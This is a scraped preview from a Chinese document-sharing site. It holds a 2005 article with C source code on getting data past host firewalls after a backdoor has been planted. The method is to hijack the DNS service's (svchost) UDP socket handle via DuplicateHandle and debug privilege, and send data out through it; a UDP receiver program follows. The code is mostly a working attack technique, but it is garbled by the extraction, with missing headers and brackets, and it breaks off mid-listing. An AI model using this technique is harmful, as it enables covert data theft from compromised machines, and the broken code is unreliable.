穿透防火墙的数据传输源码.doc_第1页
穿透防火墙的数据传输源码.doc_第2页
穿透防火墙的数据传输源码.doc_第3页
穿透防火墙的数据传输源码.doc_第4页
穿透防火墙的数据传输源码.doc_第5页
已阅读5页,还剩6页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

穿透防火墙的数据传输源码通常,在我们为目标主机安放好了后门需要将数据传输出去时,主机上的防火墙都会让我们遇到一些不大不小的麻烦。如果为我们自己的进程开一个端口(甚至是新建套接字),那么大部分的防火墙都会将其拦截。有什么方法能穿透这些防火墙呢?下面我为您介绍一种洞穿防火墙小规模传输重要数据的方法。不过,不推荐您在其它情况下使用该方法。其实我的思路很简单,既然防火墙会拦截未验证进程而放行已验证进程的数据传输,那我们就将其它进程中允许数据传输的套接字句柄拿为已用。具体过程如下:1、找出目标进程;2、找出socket句柄;2、用duplicatehandle()函数将其socket转换为能被自己使用;3、用转换后的socket进行数据传输。上面的过程写的很简单,但是实现起来还存在一些问题(后面再做讨论)。另外,从上面的实现方法中也可以看到一些很难控制的地方,比如在目标进程的 socket不能是tcp,只能是udp,因为tcp的句柄已经跟外面建立了连接。同时,针对不同系统不同进程我们也很难定位一个稳定的进程 socket。看到这么多麻烦,你有点泄气了对不对?不要着急,再想一想,其实我们有一条真正通向罗马的黄金大道。我们都知道只要一台计算机联上了网络,那么有一种数据传输是肯定不会被拦截的,不错,就是dns!你能想像域名解析数据都被拦截所造成的后果吗?既然dns是不会被拦的,而且它又是udp传输,我们就从它开刀。本文为您提供了一个通过直接控制dns进程(其实也就是svchost.exe,不过对应用户名是network service)进行数据传输的例子。查看详细源代码源代码部分:/*+made by 2005.4.12-*/#include #include #include #pragma comment(lib, ws2_32)#pragma comment(lib, wtsapi32)#define nt_success(status) (ntstatus)(status)=0)#define status_info_length_mismatch (ntstatus)0xc0000004l)typedef long ntstatus;typedef struct _system_handle_informationulong processid;uchar objecttypenumber;uchar flags;ushort handle;pvoid object;access_mask grantedaccess; system_handle_information, *psystem_handle_information;typedef ulong (winapi *zwquerysysteminformation)(ulong, pvoid, ulong, pulong);zwquerysysteminformation zwquerysysteminformation = null;bool locatentdllentry ( void )bool ret = false;char ntdll_dll = ntdll.dll;hmodule ntdll_dll = null;if ( ( ntdll_dll = getmodulehandle( ntdll_dll ) ) = null )printf( getmodulehandle() failed);return( false );if ( !( zwquerysysteminformation = ( zwquerysysteminformation )getprocaddress( ntdll_dll, zwquerysysteminformation ) ) )goto locatentdllentry_exit;ret = true;locatentdllentry_exit:if ( false = ret )printf( getprocaddress() failed);ntdll_dll = null;return( ret );/*+this routine is used to get a processs username from its sid-*/bool getusernamefromsid(psid pusersid, char *szusername)/ sanity checks and default valueif (pusersid = null)return false;strcpy(szusername, ?);sid_name_use snu;tchar szuser_max_path;dword chuser = _max_path;pdword pcchuser = &chuser; tchar szdomain_max_path;dword chdomain = _max_path;pdword pcchdomain = &chdomain;/ retrieve user name and domain name based on users sid.if (:lookupaccountsid(null, pusersid, szuser, pcchuser, szdomain, pcchdomain, &snu)wsprintf(szusername, %s, szuser);elsereturn false;return true; /*+this routine is used to get the dns processs idhere, i use wtsenumerateprocesses to get process user sid, and then get the process user name. beacause as its a network service, we cannt use openprocesstoken to catch the dns processs token information,even if we has the privilege in catching the systems.-*/dword getdnsprocessid()pwts_process_info pprocessinfo = null;dword processcount = 0;char szusername255;dword id = -1;if (wtsenumerateprocesses(wts_current_server_handle, 0, 1, &pprocessinfo, &processcount)/ dump each process descriptionfor (dword currentprocess = 0; currentprocess user.sid, szaccountname,&dwaccountsize,szdomainname, &dwdomainsize, &snu);if(hprocess)closehandle(hprocess);if(haccesstoken)closehandle(haccesstoken);return true;*/*+now, it is the most important stuff. _-*/socket getsocketfromid (dword pid)ntstatus status;pvoid buf = null;ulong size = 1;ulong numofhandle = 0;ulong i;psystem_handle_information h_info = null;handle sock = null;dword n;buf=malloc(0x1000);if(buf = null)printf(malloc wrongn);return null;status = zwquerysysteminformation( 0x10, buf, 0x1000, &n );if(status_info_length_mismatch = status)free(buf);buf=malloc(n);if(buf = null)printf(malloc wrongn);return null;status = zwquerysysteminformation( 0x10, buf, n, null);elseprintf(zwquerysysteminformation wrongn);return null;numofhandle = *(ulong*)buf;h_info = ( psystem_handle_information )(ulong)buf+4);for(i = 0; i0) / if port 0, then we can use itbreak;catch(.)continue;if ( buf != null )free( buf );return (socket)sock;/*+this is not required.-*/bool enableprivilege (pcstr name)handle htoken;bool rv;token_privileges priv = 1, 0, 0, se_privilege_enabled ;lookupprivilegevalue (0,name,&priv.privileges0.luid);priv.privileges0.attributes = se_privilege_enabled;openprocesstoken(getcurrentprocess (),token_adjust_privileges,&htoken);adjusttokenprivileges (htoken,false,&priv,sizeof priv,0,0);rv = getlasterror () = error_success;closehandle (htoken);return rv;void main() wsadata wsadata;char testbuf255;socket sock;sockaddr_in recvaddr;int iresult = wsastartup(makeword(2,2), &wsadata);if (iresult != no_error)printf(error at wsastartup()n);if(!locatentdllentry()return;if(!enableprivilege (se_debug_name)printf(enableprivilege wrongn);return;sock = getsocketfromid(getdnsprocessid();if( sock=null)printf(getsocketfromid wrongn);return;/change there value.recvaddr.sin_family = af_inet;recvaddr.sin_port = htons(5555); recvaddr.sin_addr.s_addr = inet_addr();if(socket_error = sendto(sock, test, 5, 0, (sockaddr *) &recvaddr, sizeof(recvaddr)printf(sendto wrong:%dn, wsagetlasterror();elseprintf(send ok. have fun, right? _n);getchar();/wsacleanup();return;测试代码部分:/*+udpreceiver-*/#include #include winsock2.h#pragma comment(lib, ws2_32)void main() wsadata wsadata;socket recvsocket;sockaddr_in recvaddr;int port = 5555;char recvbuf1024;int buflen = 1024;sockaddr_in senderaddr;int senderaddrsize = sizeof(senderaddr);/-/ initialize winsockwsastartup(makeword(2,2), &wsadata);/-/ create a receiver socket to receive datagramsrecvsocket = socket(af_inet, sock_dgram, ipproto_udp);/-/ bind the soc

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论